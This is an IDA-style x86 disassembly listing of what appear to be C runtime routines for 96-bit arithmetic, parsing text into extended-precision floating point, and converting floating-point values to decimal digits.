loc_43510D: ; CODE XREF: sub_4350D3+36�j
pop edi
pop esi
retn
sub_4350D3 endp
; =============== S U B R O U T I N E =======================================
sub_435110 proc near ; CODE XREF: sub_4340A9+2B�p
; sub_4340A9+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_435126
cmp ecx, esi
jnb short loc_435129
loc_435126: ; CODE XREF: sub_435110+10�j
push 1
pop eax
loc_435129: ; CODE XREF: sub_435110+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_435110 endp
; =============== S U B R O U T I N E =======================================
sub_435131 proc near ; CODE XREF: sub_4351EA+40�p
; sub_4351EA+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_435110
add esp, 0Ch
test eax, eax
jz short loc_435163
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_435110
add esp, 0Ch
test eax, eax
jz short loc_435163
inc dword ptr [esi+8]
loc_435163: ; CODE XREF: sub_435131+19�j
; sub_435131+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_435110
add esp, 0Ch
test eax, eax
jz short loc_43517B
inc dword ptr [esi+8]
loc_43517B: ; CODE XREF: sub_435131+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_435110
add esp, 0Ch
pop edi
pop esi
retn
sub_435131 endp
; =============== S U B R O U T I N E =======================================
sub_43518F proc near ; CODE XREF: sub_4351EA+30�p
; sub_4351EA+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_43518F endp
; =============== S U B R O U T I N E =======================================
sub_4351BD proc near ; CODE XREF: sub_435782+1C8�p
; sub_435F64+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_4351BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4351EA proc near ; CODE XREF: sub_4352B1+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_43525E
push edi
mov [ebp+arg_8], eax
loc_435211: ; CODE XREF: sub_4351EA+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_43518F
push ebx
call sub_43518F
lea eax, [ebp+var_10]
push eax
push ebx
call sub_435131
push ebx
call sub_43518F
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_435131
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_435211
xor edx, edx
pop edi
loc_43525E: ; CODE XREF: sub_4351EA+21�j
; sub_4351EA+9F�j
cmp [ebx+8], edx
jnz short loc_43528B
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_43525E
; ---------------------------------------------------------------------------
loc_43528B: ; CODE XREF: sub_4351EA+77�j
mov esi, 8000h
loc_435290: ; CODE XREF: sub_4351EA+B9�j
test [ebx+8], esi
jnz short loc_4352A5
push ebx
call sub_43518F
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_435290
; ---------------------------------------------------------------------------
loc_4352A5: ; CODE XREF: sub_4351EA+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_4351EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4352B1 proc near ; CODE XREF: sub_4343F2+17�p
; sub_43441F+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_4352EC: ; CODE XREF: sub_4352B1+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_435302
cmp cl, 9
jz short loc_435302
cmp cl, 0Ah
jz short loc_435302
cmp cl, 0Dh
jnz short loc_435305
loc_435302: ; CODE XREF: sub_4352B1+40�j
; sub_4352B1+45�j ...
inc edi
jmp short loc_4352EC
; ---------------------------------------------------------------------------
loc_435305: ; CODE XREF: sub_4352B1+4F�j
push 4
pop esi
loc_435308: ; CODE XREF: sub_4352B1+AE�j
; sub_4352B1+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_43558B ; default
; jumptable 00435314 case 10
jmp off_435752[eax*4] ; switch jump
loc_43531B: ; DATA XREF: .text:off_435752�o
cmp bl, 31h ; jumptable 00435314 case 0
jl short loc_43532C
cmp bl, 39h
jg short loc_43532C
loc_435325: ; CODE XREF: sub_4352B1+C4�j
; sub_4352B1+118�j
push 3
jmp loc_435549
; ---------------------------------------------------------------------------
loc_43532C: ; CODE XREF: sub_4352B1+6D�j
; sub_4352B1+72�j
cmp bl, byte_4535A8
jnz short loc_43533B
loc_435334: ; CODE XREF: sub_4352B1+124�j
push 5
jmp loc_435581
; ---------------------------------------------------------------------------
loc_43533B: ; CODE XREF: sub_4352B1+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_435361
dec eax
dec eax
jz short loc_435355
sub eax, 3
jnz loc_435624
jmp loc_4353E4
; ---------------------------------------------------------------------------
loc_435355: ; CODE XREF: sub_4352B1+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_435308
; ---------------------------------------------------------------------------
loc_435361: ; CODE XREF: sub_4352B1+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_435308
; ---------------------------------------------------------------------------
loc_43536A: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
cmp bl, 31h ; jumptable 00435314 case 1
mov [ebp+var_10], edx
jl short loc_435377
cmp bl, 39h
jle short loc_435325
loc_435377: ; CODE XREF: sub_4352B1+BF�j
cmp bl, byte_4535A8
jz loc_43543F
cmp bl, 2Bh
jz short loc_4353B9
cmp bl, 2Dh
jz short loc_4353B9
cmp bl, 30h
jz short loc_4353E4
loc_435392: ; CODE XREF: sub_4352B1+207�j
cmp bl, 43h
jle loc_435624
cmp bl, 45h
jle short loc_4353B2
cmp bl, 63h
jle loc_435624
cmp bl, 65h
jg loc_435624
loc_4353B2: ; CODE XREF: sub_4352B1+ED�j
push 6
jmp loc_435581
; ---------------------------------------------------------------------------
loc_4353B9: ; CODE XREF: sub_4352B1+D5�j
; sub_4352B1+DA�j ...
dec edi
push 0Bh
jmp loc_435581
; ---------------------------------------------------------------------------
loc_4353C1: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
cmp bl, 31h ; jumptable 00435314 case 2
jl short loc_4353CF
cmp bl, 39h
jle loc_435325
loc_4353CF: ; CODE XREF: sub_4352B1+113�j
cmp bl, byte_4535A8
jz loc_435334
cmp bl, 30h
jnz loc_435599
loc_4353E4: ; CODE XREF: sub_4352B1+9F�j
; sub_4352B1+DF�j
mov eax, edx
jmp loc_435308
; ---------------------------------------------------------------------------
loc_4353EB: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
mov [ebp+var_10], edx ; jumptable 00435314 case 3
loc_4353EE: ; CODE XREF: sub_4352B1+184�j
cmp dword_4535A4, edx
jle short loc_435407
movzx eax, bl
push esi
push eax
call sub_42F05B
pop ecx
pop ecx
push 1
pop edx
jmp short loc_435415
; ---------------------------------------------------------------------------
loc_435407: ; CODE XREF: sub_4352B1+143�j
mov ecx, off_453398
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_435415: ; CODE XREF: sub_4352B1+154�j
test eax, eax
jz short loc_435437
cmp [ebp+var_4], 19h
jnb short loc_43542F
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_435432
; ---------------------------------------------------------------------------
loc_43542F: ; CODE XREF: sub_4352B1+16C�j
inc [ebp+var_8]
loc_435432: ; CODE XREF: sub_4352B1+17C�j
mov bl, [edi]
inc edi
jmp short loc_4353EE
; ---------------------------------------------------------------------------
loc_435437: ; CODE XREF: sub_4352B1+166�j
cmp bl, byte_4535A8
jnz short loc_4354A6
loc_43543F: ; CODE XREF: sub_4352B1+CC�j
mov eax, esi
jmp loc_435308
; ---------------------------------------------------------------------------
loc_435446: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
cmp [ebp+var_4], 0 ; jumptable 00435314 case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_43545F
loc_435452: ; CODE XREF: sub_4352B1+1AC�j
cmp bl, 30h
jnz short loc_43545F
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_435452
; ---------------------------------------------------------------------------
loc_43545F: ; CODE XREF: sub_4352B1+19F�j
; sub_4352B1+1A4�j ...
cmp dword_4535A4, edx
jle short loc_435478
movzx eax, bl
push esi
push eax
call sub_42F05B
pop ecx
pop ecx
push 1
pop edx
jmp short loc_435486
; ---------------------------------------------------------------------------
loc_435478: ; CODE XREF: sub_4352B1+1B4�j
mov ecx, off_453398
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_435486: ; CODE XREF: sub_4352B1+1C5�j
test eax, eax
jz short loc_4354A6
cmp [ebp+var_4], 19h
jnb short loc_4354A1
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_4354A1: ; CODE XREF: sub_4352B1+1DD�j
mov bl, [edi]
inc edi
jmp short loc_43545F
; ---------------------------------------------------------------------------
loc_4354A6: ; CODE XREF: sub_4352B1+18C�j
; sub_4352B1+1D7�j
cmp bl, 2Bh
jz loc_4353B9
cmp bl, 2Dh
jz loc_4353B9
jmp loc_435392
; ---------------------------------------------------------------------------
loc_4354BD: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
cmp dword_4535A4, edx ; jumptable 00435314 case 5
mov [ebp+var_24], edx
jle short loc_4354D9
movzx eax, bl
push esi
push eax
call sub_42F05B
pop ecx
pop ecx
push 1
pop edx
jmp short loc_4354E7
; ---------------------------------------------------------------------------
loc_4354D9: ; CODE XREF: sub_4352B1+215�j
mov ecx, off_453398
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_4354E7: ; CODE XREF: sub_4352B1+226�j
test eax, eax
jz loc_435599
mov eax, esi
jmp short loc_43554A
; ---------------------------------------------------------------------------
loc_4354F3: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
lea ecx, [edi-2] ; jumptable 00435314 case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_435503
cmp bl, 39h
jle short loc_435547
loc_435503: ; CODE XREF: sub_4352B1+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_43557F
dec eax
dec eax
jz short loc_435573
sub eax, 3
jnz loc_435627
loc_435518: ; CODE XREF: sub_4352B1+2A4�j
push 8
jmp short loc_435581
; ---------------------------------------------------------------------------
loc_43551C: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
mov [ebp+var_20], edx ; jumptable 00435314 case 8
loc_43551F: ; CODE XREF: sub_4352B1+276�j
cmp bl, 30h
jnz short loc_435529
mov bl, [edi]
inc edi
jmp short loc_43551F
; ---------------------------------------------------------------------------
loc_435529: ; CODE XREF: sub_4352B1+271�j
cmp bl, 31h
jl loc_435624
cmp bl, 39h
jg loc_435624
jmp short loc_435547
; ---------------------------------------------------------------------------
loc_43553D: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
cmp bl, 31h ; jumptable 00435314 case 7
jl short loc_435550
cmp bl, 39h
jg short loc_435550
loc_435547: ; CODE XREF: sub_4352B1+250�j
; sub_4352B1+28A�j
push 9
loc_435549: ; CODE XREF: sub_4352B1+76�j
pop eax
loc_43554A: ; CODE XREF: sub_4352B1+240�j
dec edi
jmp loc_435308
; ---------------------------------------------------------------------------
loc_435550: ; CODE XREF: sub_4352B1+28F�j
; sub_4352B1+294�j
cmp bl, 30h
jnz short loc_435599
jmp short loc_435518
; ---------------------------------------------------------------------------
loc_435557: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
cmp [ebp+arg_18], 0 ; jumptable 00435314 case 11
jz short loc_435587
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_43557F
dec eax
dec eax
jnz loc_435627
loc_435573: ; CODE XREF: sub_4352B1+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_435308
; ---------------------------------------------------------------------------
loc_43557F: ; CODE XREF: sub_4352B1+258�j
; sub_4352B1+2B8�j
push 7
loc_435581: ; CODE XREF: sub_4352B1+85�j
; sub_4352B1+103�j ...
pop eax
jmp loc_435308
; ---------------------------------------------------------------------------
loc_435587: ; CODE XREF: sub_4352B1+2AA�j
push 0Ah
dec edi
pop eax
loc_43558B: ; CODE XREF: sub_4352B1+5D�j
; sub_4352B1+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00435314 case 10
jz loc_435629
jmp loc_435308
; ---------------------------------------------------------------------------
loc_435599: ; CODE XREF: sub_4352B1+12D�j
; sub_4352B1+238�j ...
mov edi, [ebp+arg_8]
jmp loc_435629
; ---------------------------------------------------------------------------
loc_4355A1: ; CODE XREF: sub_4352B1+63�j
; DATA XREF: .text:off_435752�o
mov [ebp+var_20], 1 ; jumptable 00435314 case 9
xor esi, esi
loc_4355AA: ; CODE XREF: sub_4352B1+339�j
cmp dword_4535A4, 1
jle short loc_4355C2
movzx eax, bl
push 4
push eax
call sub_42F05B
pop ecx
pop ecx
jmp short loc_4355D1
; ---------------------------------------------------------------------------
loc_4355C2: ; CODE XREF: sub_4352B1+300�j
mov ecx, off_453398
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_4355D1: ; CODE XREF: sub_4352B1+30F�j
test eax, eax
jz short loc_4355F1
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_4355EC
mov bl, [edi]
inc edi
jmp short loc_4355AA
; ---------------------------------------------------------------------------
loc_4355EC: ; CODE XREF: sub_4352B1+334�j
mov esi, 1451h
loc_4355F1: ; CODE XREF: sub_4352B1+322�j
mov [ebp+var_1C], esi
loc_4355F4: ; CODE XREF: sub_4352B1+371�j
cmp dword_4535A4, 1
jle short loc_43560C
movzx eax, bl
push 4
push eax
call sub_42F05B
pop ecx
pop ecx
jmp short loc_43561B
; ---------------------------------------------------------------------------
loc_43560C: ; CODE XREF: sub_4352B1+34A�j
mov ecx, off_453398
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_43561B: ; CODE XREF: sub_4352B1+359�j
test eax, eax
jz short loc_435624
mov bl, [edi]
inc edi
jmp short loc_4355F4
; ---------------------------------------------------------------------------
loc_435624: ; CODE XREF: sub_4352B1+99�j
; sub_4352B1+E4�j ...
dec edi
jmp short loc_435629
; ---------------------------------------------------------------------------
loc_435627: ; CODE XREF: sub_4352B1+261�j
; sub_4352B1+2BC�j
mov edi, ecx
loc_435629: ; CODE XREF: sub_4352B1+2DD�j
; sub_4352B1+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_435711
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_435655
cmp [ebp+var_45], 5
jl short loc_435649
inc [ebp+var_45]
loc_435649: ; CODE XREF: sub_4352B1+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_435658
; ---------------------------------------------------------------------------
loc_435655: ; CODE XREF: sub_4352B1+38D�j
mov eax, [ebp+var_C]
loc_435658: ; CODE XREF: sub_4352B1+3A2�j
cmp [ebp+var_4], 0
jbe loc_435707
loc_435662: ; CODE XREF: sub_4352B1+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_435670
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_435662
; ---------------------------------------------------------------------------
loc_435670: ; CODE XREF: sub_4352B1+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_4351EA
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_43568F
neg eax
loc_43568F: ; CODE XREF: sub_4352B1+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_43569A
add eax, [ebp+arg_10]
loc_43569A: ; CODE XREF: sub_4352B1+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_4356A2
sub eax, [ebp+arg_14]
loc_4356A2: ; CODE XREF: sub_4352B1+3EC�j
cmp eax, 1450h
jle short loc_4356D9
mov [ebp+var_2C], 1
loc_4356B0: ; CODE XREF: sub_4352B1+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_4356BC: ; CODE XREF: sub_4352B1+454�j
; sub_4352B1+45E�j
cmp [ebp+var_2C], 0
jz short loc_435722
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_435737
; ---------------------------------------------------------------------------
loc_4356D9: ; CODE XREF: sub_4352B1+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_4356E9
mov [ebp+var_30], 1
jmp short loc_4356B0
; ---------------------------------------------------------------------------
loc_4356E9: ; CODE XREF: sub_4352B1+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_436184
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_4356BC
; ---------------------------------------------------------------------------
loc_435707: ; CODE XREF: sub_4352B1+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_4356BC
; ---------------------------------------------------------------------------
loc_435711: ; CODE XREF: sub_4352B1+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_435737
; ---------------------------------------------------------------------------
loc_435722: ; CODE XREF: sub_4352B1+40F�j
cmp [ebp+var_30], 0
jz short loc_435737
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_435737: ; CODE XREF: sub_4352B1+426�j
; sub_4352B1+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_4352B1 endp
; ---------------------------------------------------------------------------
off_435752 dd offset loc_43531B ; DATA XREF: sub_4352B1+63�r
dd offset loc_43536A ; jump table for switch statement
dd offset loc_4353C1
dd offset loc_4353EB
dd offset loc_435446
dd offset loc_4354BD
dd offset loc_4354F3
dd offset loc_43553D
dd offset loc_43551C
dd offset loc_4355A1
dd offset loc_43558B
dd offset loc_435557
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435782 proc near ; CODE XREF: sub_4344C3+2B�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_4357E4
mov byte ptr [ebx+2], 2Dh
jmp short loc_4357E8
; ---------------------------------------------------------------------------
loc_4357E4: ; CODE XREF: sub_435782+5A�j
mov byte ptr [ebx+2], 20h
loc_4357E8: ; CODE XREF: sub_435782+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_43580E
test edi, edi
jnz short loc_43580E
cmp [ebp+arg_0], edi
jnz short loc_43580E
loc_4357F9: ; CODE XREF: sub_435782+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_435A0C
; ---------------------------------------------------------------------------
loc_43580E: ; CODE XREF: sub_435782+6C�j
; sub_435782+70�j ...
cmp dx, si
jnz short loc_43588D
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_435827
cmp [ebp+arg_0], 0
jz short loc_435836
loc_435827: ; CODE XREF: sub_435782+9D�j
test edi, 40000000h
jnz short loc_435836
push offset dword_437F30
jmp short loc_43587C
; ---------------------------------------------------------------------------
loc_435836: ; CODE XREF: sub_435782+A3�j
; sub_435782+AB�j
test cx, cx
jz short loc_435850
cmp edi, 0C0000000h
jnz short loc_435850
cmp [ebp+arg_0], 0
jnz short loc_435877
push offset dword_437F28
jmp short loc_43585F
; ---------------------------------------------------------------------------
loc_435850: ; CODE XREF: sub_435782+B7�j
; sub_435782+BF�j
cmp edi, eax
jnz short loc_435877
cmp [ebp+arg_0], 0
jnz short loc_435877
push offset dword_437F20
loc_43585F: ; CODE XREF: sub_435782+CC�j
lea eax, [ebx+4]
push eax
call sub_42A500
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_43586E: ; CODE XREF: sub_435782+109�j
and [ebp+var_4], 0
jmp loc_4359E5
; ---------------------------------------------------------------------------
loc_435877: ; CODE XREF: sub_435782+C5�j
; sub_435782+D0�j ...
push offset dword_437F18
loc_43587C: ; CODE XREF: sub_435782+B2�j
lea eax, [ebx+4]
push eax
call sub_42A500
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_43586E
; ---------------------------------------------------------------------------
loc_43588D: ; CODE XREF: sub_435782+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_436184
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_4358EE
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_435F64
pop ecx
pop ecx
loc_4358EE: ; CODE XREF: sub_435782+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_435908
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_43590B
jmp loc_4357F9
; ---------------------------------------------------------------------------
loc_435908: ; CODE XREF: sub_435782+173�j
mov edi, [ebp+arg_C]
loc_43590B: ; CODE XREF: sub_435782+17F�j
cmp edi, 15h
jle short loc_435913
push 15h
pop edi
loc_435913: ; CODE XREF: sub_435782+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_435929: ; CODE XREF: sub_435782+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_43518F
dec [ebp+arg_14]
pop ecx
jnz short loc_435929
test esi, esi
jge short loc_435953
neg esi
and esi, 0FFh
jle short loc_435953
loc_435946: ; CODE XREF: sub_435782+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_4351BD
dec esi
pop ecx
jnz short loc_435946
loc_435953: ; CODE XREF: sub_435782+1B8�j
; sub_435782+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_4359B0
mov [ebp+arg_C], ecx
loc_435963: ; CODE XREF: sub_435782+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_43518F
lea eax, [ebp+var_10]
push eax
call sub_43518F
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_435131
lea eax, [ebp+var_10]
push eax
call sub_43518F
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_435963
mov eax, [ebp+arg_14]
loc_4359B0: ; CODE XREF: sub_435782+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_4359ED
loc_4359BD: ; CODE XREF: sub_435782+248�j
cmp eax, ecx
jb short loc_4359D0
cmp byte ptr [eax], 39h
jnz short loc_4359CC
mov byte ptr [eax], 30h
dec eax
jmp short loc_4359BD
; ---------------------------------------------------------------------------
loc_4359CC: ; CODE XREF: sub_435782+242�j
cmp eax, ecx
jnb short loc_4359D4
loc_4359D0: ; CODE XREF: sub_435782+23D�j
inc eax
inc word ptr [ebx]
loc_4359D4: ; CODE XREF: sub_435782+24C�j
inc byte ptr [eax]
loc_4359D6: ; CODE XREF: sub_435782+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_4359E5: ; CODE XREF: sub_435782+F0�j
mov eax, [ebp+var_4]
loc_4359E8: ; CODE XREF: sub_435782+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4359ED: ; CODE XREF: sub_435782+239�j
; sub_435782+275�j
cmp eax, ecx
jb short loc_4359FD
cmp byte ptr [eax], 30h
jnz short loc_4359F9
dec eax
jmp short loc_4359ED
; ---------------------------------------------------------------------------
loc_4359F9: ; CODE XREF: sub_435782+272�j
cmp eax, ecx
jnb short loc_4359D6
loc_4359FD: ; CODE XREF: sub_435782+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_435A0C: ; CODE XREF: sub_435782+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_4359E8
sub_435782 endp
; =============== S U B R O U T I N E =======================================
